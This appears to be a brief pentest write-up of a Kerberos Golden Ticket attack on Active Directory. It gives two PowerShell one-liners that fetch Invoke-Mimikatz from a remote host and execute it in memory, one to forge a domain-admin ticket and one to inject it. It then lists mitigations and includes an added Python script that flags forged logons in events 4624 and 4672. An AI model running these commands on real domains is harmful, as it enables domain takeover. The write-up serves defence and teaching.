Golden Ticket Attack

Figure 1: Obtained Hash and SID
Figure 2: Failed Access
iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command '"kerberos::golden /admin:IDontExist23 /domain:plum.local /sid:S-1-5-21-XXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /krbtgt:<hash> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080"'

iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'
Figure 3: Created Golden Ticket
Figure 4: Injected Golden Ticket
Figure 5: Validated Access

Mitigation:

  • Reset the krbtgt password (twice) to invalidate current golden tickets
  • Review and filter Security Event IDs 4624 and 4672
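One way to filter those two event IDs, as an added example that is not from the original article: compare the account name in each 4624/4672 event with the name the directory holds for the SID in the same event, which catches a ticket issued for a made-up name such as IDontExist23 on RID 500. Assumptions: events have already been exported into dictionaries keyed by their EventData field names, the logged name is the one carried in the ticket, and the domain SID, directory snapshot, sample events and the function name `suspicious_logons` are constructed for illustration.

```python
# Added example: name/SID consistency check over Security events 4624 and 4672.
# All SIDs, accounts and events below are constructed sample data.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # placeholder

# Snapshot of the directory: SID -> sAMAccountName (assumed to be exported from AD).
DIRECTORY = {
    DOMAIN_SID + "-500": "Administrator",
    DOMAIN_SID + "-1104": "jsmith",
}

# Event ID -> (account-name field, SID field) as named in the event's EventData.
FIELDS = {
    4624: ("TargetUserName", "TargetUserSid"),
    4672: ("SubjectUserName", "SubjectUserSid"),
}

EVENTS = [
    {"EventID": 4624, "TargetUserName": "jsmith", "TargetUserSid": DOMAIN_SID + "-1104"},
    {"EventID": 4624, "TargetUserName": "IDontExist23", "TargetUserSid": DOMAIN_SID + "-500"},
    {"EventID": 4672, "SubjectUserName": "IDontExist23", "SubjectUserSid": DOMAIN_SID + "-500"},
    {"EventID": 4672, "SubjectUserName": "Administrator", "SubjectUserSid": DOMAIN_SID + "-500"},
    {"EventID": 4672, "SubjectUserName": "SYSTEM", "SubjectUserSid": "S-1-5-18"},
    {"EventID": 4624, "TargetUserName": "ghost", "TargetUserSid": DOMAIN_SID + "-9999"},
]

def suspicious_logons(events, directory, domain_sid):
    """Return (event_id, name, sid, reason) for each inconsistent domain logon."""
    findings = []
    for ev in events:
        fields = FIELDS.get(ev.get("EventID"))
        if fields is None:
            continue  # not a logon or special-privilege event
        name, sid = ev.get(fields[0], ""), ev.get(fields[1], "")
        if not sid.startswith(domain_sid + "-"):
            continue  # local and well-known SIDs (e.g. S-1-5-18) are out of scope
        known = directory.get(sid)
        if known is None:
            findings.append((ev["EventID"], name, sid, "SID not in directory"))
        elif known.lower() != name.lower():
            findings.append((ev["EventID"], name, sid, "directory name is " + known))
    return findings

if __name__ == "__main__":
    for finding in suspicious_logons(EVENTS, DIRECTORY, DOMAIN_SID):
        print(finding)
```
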

Mike Bond
